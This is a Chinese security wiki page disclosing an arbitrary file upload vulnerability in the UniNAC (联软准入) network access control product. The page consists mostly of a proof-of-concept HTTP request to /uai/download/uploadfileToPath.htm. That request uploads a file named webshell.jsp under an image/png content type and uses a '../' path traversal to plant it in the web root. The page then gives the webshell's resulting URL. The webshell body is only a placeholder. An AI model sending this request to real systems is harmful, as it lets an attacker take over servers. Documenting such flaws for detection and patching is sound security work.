menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right 联软准入 UniNAC chevron_right 联软准入UniNAC任意文件上传
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    联软准入UniNAC 任意文件上传

    影响版本:

    • 未知

    poc:

    POST /uai/download/uploadfileToPath.htm HTTP/1.1
    
    HOST: xxxxx
    
    -----------------------------570xxxxxxxxx6025274xxxxxxxx1
    
    Content-Disposition: form-data; name="input_localfile"; filename="webshell.jsp"
    
    Content-Type: image/png
    
    <%@page webshell%>
    
    -----------------------------570xxxxxxxxx6025274xxxxxxxx1
    
    Content-Disposition: form-data; name="uploadpath"
    
    ../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

    webshell地址:/notifymsg/devreport/webshell.jsp